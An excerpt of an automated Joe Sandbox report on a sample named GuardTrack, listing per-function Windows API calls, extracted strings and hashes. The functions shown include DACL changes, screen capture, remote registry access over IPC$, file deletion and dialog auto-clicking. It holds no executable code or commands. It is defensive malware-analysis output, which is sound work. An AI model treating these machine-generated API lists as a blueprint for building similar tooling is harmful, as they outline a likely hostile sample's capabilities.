Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: b7be90252f38496c4ac4c6e921585f4493b9cf1862cc9353397190751dbc7803
Instruction ID: 022ec8a168b3aa09ae31d01605d93fa131d8c51a05637eeff2c5b318e2ba8874
Opcode Fuzzy Hash: b7be90252f38496c4ac4c6e921585f4493b9cf1862cc9353397190751dbc7803
Instruction Fuzzy Hash: 61817C716083159FD714CF14C985AABBBEAFF89364F00492EF999A3391C730D905CBA2

Function 00608ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00608E3C
Part of subcall function 00608E20: GetLastError.KERNEL32(?,00608900,?,?,?), ref: 00608E46
Part of subcall function 00608E20: GetProcessHeap.KERNEL32(00000008,?,?,00608900,?,?,?), ref: 00608E55
Part of subcall function 00608E20: HeapAlloc.KERNEL32(00000000,?,00608900,?,?,?), ref: 00608E5C
Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00608E73

Part of subcall function 00608EBD: GetProcessHeap.KERNEL32(00000008,00608916,00000000,00000000,?,00608916,?), ref: 00608EC9
Part of subcall function 00608EBD: HeapAlloc.KERNEL32(00000000,?,00608916,?), ref: 00608ED0
Part of subcall function 00608EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00608916,?), ref: 00608EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00608B2E
_memset.LIBCMT ref: 00608B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00608B62
GetLengthSid.ADVAPI32(?), ref: 00608B73
GetAce.ADVAPI32(?,00000000,?), ref: 00608BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00608BCC
GetLengthSid.ADVAPI32(?), ref: 00608BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00608BF8
HeapAlloc.KERNEL32(00000000), ref: 00608BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00608C20
CopySid.ADVAPI32(00000000), ref: 00608C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00608C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00608C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00608C92

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 6b04ecb4e0b7ef8f02cfd77725b11121aaac060f2abe8d644d34c9ba8634a7db
Instruction ID: 2ab852e8d4288e2916908881b0c2539dce59f7b45bd902d30d06edfb799ef5e8
Opcode Fuzzy Hash: 6b04ecb4e0b7ef8f02cfd77725b11121aaac060f2abe8d644d34c9ba8634a7db
Instruction Fuzzy Hash: B8617B75940219EFEF14DFA0DC48EEEBB7AFF05304F048169EA95A7290DB709A00CB60

Function 00627A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00627A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00627A85
CreateCompatibleDC.GDI32(?), ref: 00627A91
SelectObject.GDI32(00000000,?), ref: 00627A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00627AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00627B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00627B52
SelectObject.GDI32(00000006,?), ref: 00627B5A
DeleteObject.GDI32(?), ref: 00627B63
DeleteDC.GDI32(00000006), ref: 00627B6A
ReleaseDC.USER32(00000000,?), ref: 00627B75

Strings

(, xrefs: 00627AFA

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 7e633b75ae2a9deeb0297d2d47fe832119eeb283189147cafaa3372040f42f78
Instruction ID: 55db624f31a04d8b034634aab23992fb60060d91542e4e413084d5261e4e65c7
Opcode Fuzzy Hash: 7e633b75ae2a9deeb0297d2d47fe832119eeb283189147cafaa3372040f42f78
Instruction Fuzzy Hash: C5517B75904619EFDB14CFA8DC84EAEBBBAEF49710F14841DFA4AA7210C731A9418F60

Function 0061A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0061A4D4

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0061A4F6
__swprintf.LIBCMT ref: 0061A54F
__swprintf.LIBCMT ref: 0061A568
_wprintf.LIBCMT ref: 0061A61E
_wprintf.LIBCMT ref: 0061A63C

Strings

Error: , xrefs: 0061A5E6
"%s" (%d) : ==> %s:%s%s, xrefs: 0061A619
^ ERROR, xrefs: 0061A5C0
Line %d (File "%s"):, xrefs: 0061A549, 0061A562
"%s" (%d) : ==> %s:, xrefs: 0061A637

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 425e34abc2b759e8888d8d0b315ac8c2a42be5277326cd7d7711bc96c5111c59
Instruction ID: cbf4ec29fc5bdddef3eb78e1d3b484cbdcf38fa5cd0b739711e5fd84ef0dbdac
Opcode Fuzzy Hash: 425e34abc2b759e8888d8d0b315ac8c2a42be5277326cd7d7711bc96c5111c59
Instruction Fuzzy Hash: 6451C07180111AAECF14EBE0CD4AEEEBB7ABF45340F140129F505B21A2DB316F89DB95

Function 00619710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0061951A: __time64.LIBCMT ref: 00619524

Part of subcall function 005C4A8C: _fseek.LIBCMT ref: 005C4AA4

__wsplitpath.LIBCMT ref: 006197EF

Part of subcall function 005D431E: __wsplitpath_helper.LIBCMT ref: 005D435E

_wcscpy.LIBCMT ref: 00619802
_wcscat.LIBCMT ref: 00619815
__wsplitpath.LIBCMT ref: 0061983A
_wcscat.LIBCMT ref: 00619850
_wcscat.LIBCMT ref: 00619863

Part of subcall function 00619560: _memmove.LIBCMT ref: 00619599
Part of subcall function 00619560: _memmove.LIBCMT ref: 006195A8

_wcscmp.LIBCMT ref: 006197AA

Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DE1
Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00619A0D
_wcsncpy.LIBCMT ref: 00619A80
DeleteFileW.KERNEL32(?,?), ref: 00619AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00619ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00619ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00619AEF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: e4ea15ccac050c886f62f1852662b710fbc26e165d864e27e467a7dc93731f53
Instruction ID: 1f446d76e6779797b42796f4cc153fee1058d177f85e9a8db72263aad90ec695
Opcode Fuzzy Hash: e4ea15ccac050c886f62f1852662b710fbc26e165d864e27e467a7dc93731f53
Instruction Fuzzy Hash: D0C140B1D00119AEDF21DF95CC95EDEBBBDEF85300F0440AAF609E6251EB709A848F65

Function 005C5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005C5BF1
GetMenuItemCount.USER32(00677890), ref: 00600E7B
GetMenuItemCount.USER32(00677890), ref: 00600F2B
GetCursorPos.USER32(?), ref: 00600F6F
SetForegroundWindow.USER32(00000000), ref: 00600F78
TrackPopupMenuEx.USER32(00677890,00000000,?,00000000,00000000,00000000), ref: 00600F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600F97

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 022caa699ed72116214d9682ba277b1d74be0bea406011e5780fac387c529f3e
Instruction ID: 59c04cd7be73dd01a64c909c436032cca3ba7db27c25b353484f0a7bc40d8653
Opcode Fuzzy Hash: 022caa699ed72116214d9682ba277b1d74be0bea406011e5780fac387c529f3e
Instruction Fuzzy Hash: 42710470684616BEFB248B94CC49FEBBF66FF04324F10421AF624662D0D7B06CA0DB90

Function 0061AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00640980), ref: 0061AF4E
GetDriveTypeW.KERNEL32(00000061,0066B5F0,00000061), ref: 0061B018
_wcscpy.LIBCMT ref: 0061B042

Strings

removable, xrefs: 0061AF80
all, xrefs: 0061AF54
network, xrefs: 0061AFAC
ramdisk, xrefs: 0061AFC2
unknown, xrefs: 0061AFD9
cdrom, xrefs: 0061AF6A
L,d, xrefs: 0061B03A
fixed, xrefs: 0061AF96

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,d$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1864249466
Opcode ID: 2a84ba67966365168eeeb4c0cb9fcbb40622bea0ae39079efcb29423e0bc88b9
Instruction ID: e4d4199787451d6e533bce6616d81635ba9f124e6edfefa544586c8b26795f91
Opcode Fuzzy Hash: 2a84ba67966365168eeeb4c0cb9fcbb40622bea0ae39079efcb29423e0bc88b9
Instruction Fuzzy Hash: 4851C2701043069FC320EF54C895AEABBA6FF94300F54581EF496872E2DB30ED8ACA53

Function 006083FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

_memset.LIBCMT ref: 00608489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 006084BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 006084DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 006084F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00608520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00608548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00608553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00608558

Strings

\CLSID, xrefs: 00608440
SOFTWARE\Classes\, xrefs: 0060842A
\IPC$, xrefs: 006084A0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: a3f36ecdb75824705723c50ef8378a7943221d10704437e764eb8a946992707d
Instruction ID: 4fce5ca51031a9abf2f8451eadca165965fa525e7fce6a396005b5079bff1f83
Opcode Fuzzy Hash: a3f36ecdb75824705723c50ef8378a7943221d10704437e764eb8a946992707d
Instruction Fuzzy Hash: A3410976C1062DAFDF15EBE4DC55EEEBB79BF45740B004129F945A3291EA309D04CB90

Function 0063147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0063040D,?,?), ref: 00631491

Strings

HKEY_CURRENT_CONFIG, xrefs: 0063154E
HKEY_USERS, xrefs: 00631592
HKEY_CURRENT_USER, xrefs: 00631570
HKCR, xrefs: 00631539
HKCU, xrefs: 00631581
HKEY_CLASSES_ROOT, xrefs: 00631524
HKEY_LOCAL_MACHINE, xrefs: 006314FA
HKU, xrefs: 006315A3
HKCC, xrefs: 0063155F
HKLM, xrefs: 0063150F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 422ef7048e0355051cb5d8947be27e1aa195c46f45359f169c75d257da1eaffa
Instruction ID: 240ad75e9cc5b1db5316d46e64ed6e3c2769d40e8702336985644a6b245a2732
Opcode Fuzzy Hash: 422ef7048e0355051cb5d8947be27e1aa195c46f45359f169c75d257da1eaffa
Instruction Fuzzy Hash: AC41807050025ACBCF10EF94D854AEA3B66FFA2320F505416FC925B392DB31ED1ACBA1

Function 0060FF5C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005FFB41,00000010,?,Bad directive syntax error,00640980,00000000,?,?,?), ref: 0060FF7D
LoadStringW.USER32(00000000,?,005FFB41,00000010), ref: 0060FF84

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

_wprintf.LIBCMT ref: 0060FFB7
__swprintf.LIBCMT ref: 0060FFD9
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00610048

Strings

Line %d:, xrefs: 0060FFD3
%s (%d) : ==> %s.: %s %s, xrefs: 0060FFB2
., xrefs: 0061002E
Error: , xrefs: 00610016
Line %d (File "%s"):, xrefs: 0060FFEE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 9f2bd84a7260e35532b16cf0e030523956d748607a97f5819abe470d54a0bad6
Instruction ID: bdec0c6a99e24cae5f7a1fce5da5f0b10f99133628c5fb3ddfad158c4984912e
Opcode Fuzzy Hash: 9f2bd84a7260e35532b16cf0e030523956d748607a97f5819abe470d54a0bad6
Instruction Fuzzy Hash: 4221413184022EAFDF25EFD0CC1AFEE7B36BF59300F04045AF515621A2DA71AA68DB55

Function 00615882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B

Part of subcall function 005C153B: _memmove.LIBCMT ref: 005C15C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006158EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00615901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00615912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00615924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00615935

Strings

play PlayMe wait, xrefs: 0061591F
play PlayMe, xrefs: 00615930
status PlayMe mode, xrefs: 006158E6
alias PlayMe, xrefs: 006158C4
close PlayMe, xrefs: 006158FC, 00615929
open , xrefs: 0061589A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: d516b6de807e5d2b9acdbec7bd760cc80ba9886f1ffd4aa749c6b0cdfbdcef58
Instruction ID: 685e1848cf127b58977229980fcfbf01892bb2f3d27d93faffe1eeb6895d90c8
Opcode Fuzzy Hash: d516b6de807e5d2b9acdbec7bd760cc80ba9886f1ffd4aa749c6b0cdfbdcef58
Instruction Fuzzy Hash: 2B119331A4016AF9D710E7B1DC4AEFFAF7DFBD2B50F440829B405E21D1EA601984C9A1

Function 00614C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00614C27
gethostname.WSOCK32(?,00000100), ref: 00614C41
gethostbyname.WSOCK32(?), ref: 00614C4E
_wcscpy.LIBCMT ref: 00614C76
_memmove.LIBCMT ref: 00614C89
inet_ntoa.WSOCK32(?), ref: 00614C94
_strcat.LIBCMT ref: 00614CA2
_wcscpy.LIBCMT ref: 00614CB9
WSACleanup.WSOCK32 ref: 00614CC7
_wcscpy.LIBCMT ref: 00614CD5

Strings

0.0.0.0, xrefs: 00614C70

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 6c053cd8bc0a327c1512869d91954b85f55b13262a713f49e25a5be03ac88f0e
Instruction ID: 25abc451c29b1437b5291fc09c937fe4a025957c23f608939a93b32214a3c1b8
Opcode Fuzzy Hash: 6c053cd8bc0a327c1512869d91954b85f55b13262a713f49e25a5be03ac88f0e
Instruction Fuzzy Hash: E0113A3150411AAFDB20B7649D4EEEA7BBEEF81710F080167F50497291EF7099C18AE0

Function 00615530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00615535

Part of subcall function 005D083E: timeGetTime.WINMM(?,00000002,005BC22C), ref: 005D0842

Sleep.KERNEL32(0000000A), ref: 00615561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00615585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006155A7
SetActiveWindow.USER32 ref: 006155C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006155D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 006155F3
Sleep.KERNEL32(000000FA), ref: 006155FE
IsWindow.USER32 ref: 0061560A
EndDialog.USER32(00000000), ref: 0061561B

Strings

BUTTON, xrefs: 00615599

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7479a45ceb747f59c68cbb79830dca1a54ba5940403501ff1198f2dd671fce5d
Instruction ID: a9782752d4b4dffeadbf4e527a747304910a0d09821f8c0632c2871e18b93517
Opcode Fuzzy Hash: 7479a45ceb747f59c68cbb79830dca1a54ba5940403501ff1198f2dd671fce5d
Instruction Fuzzy Hash: A3219F78644604EFF7845F70ED89AA57B6BEB85345F083018F50B822B1EF719DD09AB1

Function 0061DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

CoInitialize.OLE32(00000000), ref: 0061DC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0061DCC0
SHGetDesktopFolder.SHELL32(?), ref: 0061DCD4
CoCreateInstance.OLE32(00643D4C,00000000,00000001,0066B86C,?), ref: 0061DD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0061DD8F
CoTaskMemFree.OLE32(?,?), ref: 0061DDE7
_memset.LIBCMT ref: 0061DE24
SHBrowseForFolderW.SHELL32(?), ref: 0061DE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0061DE83
CoTaskMemFree.OLE32(00000000), ref: 0061DE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0061DEC1
CoUninitialize.OLE32(00000001,00000000), ref: 0061DEC3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
